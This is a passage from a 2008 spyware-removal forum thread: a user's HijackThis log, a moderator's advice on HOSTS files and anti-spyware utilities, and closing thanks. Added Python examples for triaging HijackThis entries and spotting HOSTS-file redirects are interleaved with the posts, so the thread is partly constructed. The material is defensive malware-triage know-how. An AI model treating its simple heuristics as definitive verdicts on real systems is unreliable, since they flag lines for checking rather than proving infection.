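    return [raw for _sec, body, raw in parse_entries(log_text)
            if any(marker in body for marker in ORPHAN_MARKERS)]


def name_servers(log_text):
    """Distinct DNS server addresses set via O17 entries, in order of appearance."""
    seen = []
    for sec, body, _raw in parse_entries(log_text):
        if sec != "O17":
            continue
        m = NAMESERVER_RE.search(body)
        if not m:
            continue
        for ip in m.group(1).split(","):
            if ip and ip not in seen:
                seen.append(ip)
    return seen


def triage(log_text):
    """Return the entries worth a second look, each with the reason it was selected."""
    findings = []
    for sec, body, raw in parse_entries(log_text):
        if any(marker in body for marker in ORPHAN_MARKERS):
            findings.append(Finding(sec, "orphaned entry: target file missing, safe to fix", raw))
        elif sec == "O17":
            findings.append(Finding(sec, "DNS servers set in the registry: confirm they belong to your ISP", raw))
        elif sec == "O20":
            findings.append(Finding(sec, "AppInit_DLLs loads this DLL into every GUI process: confirm its owner", raw))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.section}: {f.reason}\n    {f.line}")
```

Run against a saved log, the orphaned list is what you would tick before "Fix checked"; the O17 and O20 findings are not verdicts, only the lines to verify by hand, which is how the log was read in this thread.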


#18 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 20 June 2008 - 08:30 AM

Everything seems fine now :). Did as you told me.
I also used the Windows search feature for the terms "anywebcam" and "broadcaster"; nothing was returned.

I uninstalled the Yahoo toolbar yesterday; this may explain the missing file entries in HijackThis. Here's the most recent one:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:21:17 PM, on 6/20/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\WLTRAY.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Ahmed Fahmy\My Documents\My Downloads\HiJackThis.exe
\?\C:\WINDOWS\system32\WBEM\WMIADAP.EXE

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://jobreeze.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft....k/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft....k/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft....k/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office12\GRA8E1~1.DLL
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [Broadcom Wireless Manager UI] C:\WINDOWS\system32\WLTRAY.exe
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [VMSnap3] C:\WINDOWS\VMSnap3.EXE
O4 - HKLM\..\Run: [Domino] C:\WINDOWS\Domino.EXE
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
O4 - Global Startup: Bluetooth.lnk = ?
O8 - Extra context menu item: Download Using &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra button: Bonjour - {7F9DB11C-E358-4ca6-A83D-ACC663939424} - C:\Program Files\Bonjour\ExplorerPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zon...kr.cab56986.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcaf...01/mcinsctl.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zon...1/GAME_UNO1.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zon...ro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zon...nt.cab56907.cab
O16 - DPF: {DA758BB1-5F89-4465-975F-8D7179A4BCF3} (WheelofFortune Object) - http://messenger.zon...oF.cab57176.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zon...er.cab56986.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BF5CCFB5-6096-404D-B329-56E8F3847FA6}: NameServer = 62.117.40.111,62.117.40.112
O17 - HKLM\System\CCS\Services\Tcpip\..\{CA254E2C-5690-497E-9971-569C6268C2DB}: NameServer = 62.117.40.111,80.75.166.250
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MI1933~1\Office12\GR99D3~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: GoogleDesktopManager - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktopManager.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: MySQL - Unknown owner - C:\Program.exe (file missing)
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: TuneUp Drive Defrag Service (TuneUp.Defrag) - TuneUp Software GmbH - C:\WINDOWS\System32\TuneUpDefragService.exe
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\WINDOWS\System32\WLTRYSVC.EXE

--
End of file - 10457 bytes

#19 TheJoker

TheJoker

    Forum Deity

  • Boot Camp Mod
  • PipPipPipPipPip
  • 14,352 posts

Posted 20 June 2008 - 05:17 PM

Everything looks good. :D

There are several free utilities you can use to help keep malware off your system:

A HOSTS file will prevent Internet Explorer from communicating with sites known to be associated with adware or spyware. A good regularly updated HOST file is MVPS HOSTS File, available at http://www.mvps.org/...p2002/hosts.htm.

IE/SPYAD adds sites associated with ads and spyware to your Internet Restricted Zone and you can download that at http://www.spywarewa...uc/resource.htm.

A free non-resident utility to prevent the installation of ActiveX-based malware is JavaCool's SpywareBlaster. For real-time protection, there is SpywareGuard. Both are available at http://www.javacools...m/products.html.

I recommend reading Tony Klein's article So How did I get Infected in the First Place? at http://forums.spywar...showtopic=60955

Does your problem appear resolved?

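TheJoker's HOSTS file advice works because Windows consults the HOSTS file before asking DNS, so a name mapped there to 0.0.0.0 or 127.0.0.1 never reaches the ad or spyware server. The Python below is an added example, not code from the thread or from the MVPS project: it parses a constructed HOSTS file (placeholder names in the reserved .example domain, not entries from the real MVPS list), answers whether a given name would be blocked, and flags the opposite pattern, a name redirected to some other real address, which is what a HOSTS file edited by malware to keep security sites unreachable looks like.

```python
"""Check hostnames against a HOSTS file and spot entries that redirect rather than block.

Added example, not part of the thread or of the MVPS HOSTS project.
SAMPLE_HOSTS is constructed: every name is a placeholder in the reserved
.example domain and the 10.11.12.13 address is invented for the demo.
"""
import ipaddress

SAMPLE_HOSTS = """\
# Constructed sample, not a real HOSTS file
127.0.0.1       localhost
0.0.0.0         ads.adserver.example        # blocked: resolves to the null address
127.0.0.1       tracker.spyware.example     # blocked: resolves to loopback
10.11.12.13     update.antivirus.example    # redirect: sent somewhere else entirely
"""

# Addresses a blocklist-style HOSTS file uses to make a name go nowhere.
BLOCK_ADDRESSES = {"0.0.0.0", "127.0.0.1", "::1"}


def parse_hosts(text):
    """Return {hostname: address} with comments stripped and names lowercased."""
    table = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue                           # no hostname on this line
        try:
            address = str(ipaddress.ip_address(parts[0]))
        except ValueError:
            continue                           # malformed address; skip the line
        for name in parts[1:]:
            table.setdefault(name.lower(), address)   # keep the first entry for a name
    return table


def lookup(table, hostname):
    """Classify a name as ("blocked" | "redirected" | "unlisted", address)."""
    address = table.get(hostname.lower().rstrip("."))
    if address is None:
        return ("unlisted", None)
    if address in BLOCK_ADDRESSES:
        return ("blocked", address)
    return ("redirected", address)


def suspicious_redirects(table):
    """Names sent to a real address instead of a null/loopback one.

    A legitimate blocklist never does this; an attacker who wants an update or
    security site to land on a server of their choosing does.
    """
    return sorted((name, addr) for name, addr in table.items()
                  if addr not in BLOCK_ADDRESSES)


if __name__ == "__main__":
    hosts = parse_hosts(SAMPLE_HOSTS)
    for name in ("Ads.AdServer.example", "update.antivirus.example", "www.example.com"):
        print(name, "->", lookup(hosts, name))
    print("redirects to review:", suspicious_redirects(hosts))
```

To run it against the real file, read `C:\WINDOWS\system32\drivers\etc\hosts` into `parse_hosts`; any line listed by `suspicious_redirects` that you did not add yourself deserves the same scrutiny as an O1 entry in a HijackThis log.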


#20 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 20 June 2008 - 07:08 PM

Yes, thanks a lot Joker :). You guys are doing great work here on spywareinfo. You helped me like 5 times now, much appreciated :D

I will check the software you mentioned, thanks for the list.

By the way, you should spread the word about how to uninstall anywebcam, since it seems to be a well-known unsolvable problem for many.


Thanks again ^_^

#21 TheJoker

TheJoker

    Forum Deity

  • Boot Camp Mod
  • PipPipPipPipPip
  • 14,352 posts

Posted 21 June 2008 - 09:44 AM

Glad we could help. :)

If you need this topic reopened, please tell the moderating team by replying here with the address of the thread. This applies only to the original topic starter. Everyone else please begin a New Topic.





